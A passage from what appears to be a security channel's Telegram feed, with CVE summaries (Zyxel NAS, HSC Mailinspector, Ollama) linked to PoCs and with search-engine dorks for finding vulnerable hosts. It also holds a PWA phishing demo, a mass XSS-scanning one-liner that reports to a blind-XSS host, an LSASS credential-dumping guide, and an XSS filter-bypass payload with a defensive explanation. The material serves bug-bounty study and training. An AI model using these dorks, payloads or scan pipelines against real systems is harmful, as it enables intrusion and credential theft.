Brut Security – Telegram
Brut Security
14.7K subscribers
913 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
⚠️CVE-2024-29973: Unauthorized command injection in Zyxel NAS devices⚠️

🔍This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request.

📌PoC: https://github.com/k3lpi3b4nsh33/CVE-2024-29973

📣Dorks:
🔽Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326"
🔼FOFA: app="NAS542" || app="ZYXEL-NAS326"
🔽SHODAN: http.noscript:"Zyxel NAS326"
⚠️Progressive Web App (PWA) Phishing⚠️

📌Attack Scenario: A user lands on index.html and clicks the "Install Microsoft Application" button. The install app prompt appears and, once the user installs it, the JavaScript embedded in index.html redirects the PWA window to the phishing page that has a fake URL bar at the top (i.e., mrd0x.html). Ensure that you're testing this over HTTPS to avoid encountering issues.

📣Blog Link: https://mrd0x.com/progressive-web-apps-pwa-phishing

🔗POC: https://github.com/mrd0x/PWA-Phishing

⚠️This is simply to demonstrate how PWA phishing works. Don't use it for illegal purposes.
🔼 One-Liner XSS 🔽

subfinder -dL domainlist1.txt | dnsx | shuf | (gau || hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Methods for Dump LSASS.pdf
33.4 MB
💥Methods for Dump LSASS💥
☄️KnoXSS XSS Payload - confirm?.(1)
🔍Credit: @lu3ky13

#bugbounty #bugbountytips
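Why this payload matters to a defender, as an added example in JavaScript that is not code from the post or from KnoXSS: a naive keyword blocklist (constructed here) misses the optional-call form, while contextual output encoding neutralizes it regardless of syntax.

```javascript
// Added example (not from the post or from KnoXSS): why a keyword blocklist
// does not stop `confirm?.(1)`, and what does. Optional-call syntax `f?.(x)`
// is valid JavaScript that calls f when it is defined, so the payload never
// contains the literal "confirm(" token that naive filters look for.

// Naive blocklist of the kind found in home-grown sanitizers and WAF rules.
const NAIVE_PATTERN = /\b(alert|confirm|prompt)\s*\(/i;
function naiveBlocklistRejects(input) {
  return NAIVE_PATTERN.test(input);
}

// Contextual output encoding for HTML body text. This neutralizes the payload
// regardless of its syntax, because the browser never parses it as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Shows the optional-call semantics on a constructed object: the call runs when
// the member exists and quietly yields undefined when it does not.
function optionalCallSemantics() {
  const withConfirm = { confirm: (x) => "called:" + x };
  const without = {};
  return [withConfirm.confirm?.(1), without.confirm?.(1)];
}

// Constructed sample inputs.
const CLASSIC = "<img src=x onerror=confirm(1)>";
const VARIANT = "<img src=x onerror=confirm?.(1)>";

function demo() {
  return {
    classicBlocked: naiveBlocklistRejects(CLASSIC), // true
    variantBlocked: naiveBlocklistRejects(VARIANT), // false: blocklist bypassed
    variantEncoded: escapeHtml(VARIANT),            // rendered as text, not markup
    optionalCall: optionalCallSemantics(),          // ["called:1", undefined]
  };
}
```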
Recon workflow.pdf
77.4 KB
👀Top 1% on TryHackMe? That’s Cute👀

🤡I've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

🙂In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

✉️Thoughts?
☄️CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

📣An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

🚫PoC: https://lnkd.in/gK4NHJ4C
⛔️Video POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

🌐Dorks:
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."
💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥

⚠️Slots remaining: 4

💯Registration Link:
https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!

🖥 Starts: mid-July 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
Mode: Online | Language: English
🔗 Course Module:
https://lnkd.in/gfZbBCFn
ceh-v12-exam-set.pdf
1.6 MB
☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
🔫Smap - passive Nmap-like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes the same command-line arguments as Nmap and produces the same output, which makes it a drop-in replacement for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security
▶️This June batch is filled with talented students 🫶

👀July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Looking for someone who can contribute to the next 30-day Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability

⚠️The issue is a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit it to overwrite arbitrary files on the server, ultimately leading to remote code execution.

🔥PoC:
https://lnkd.in/gk6Wvq_P

💥Dorks:
Hunter: product.name="Ollama Web"
FOFA: app="Ollama-Web"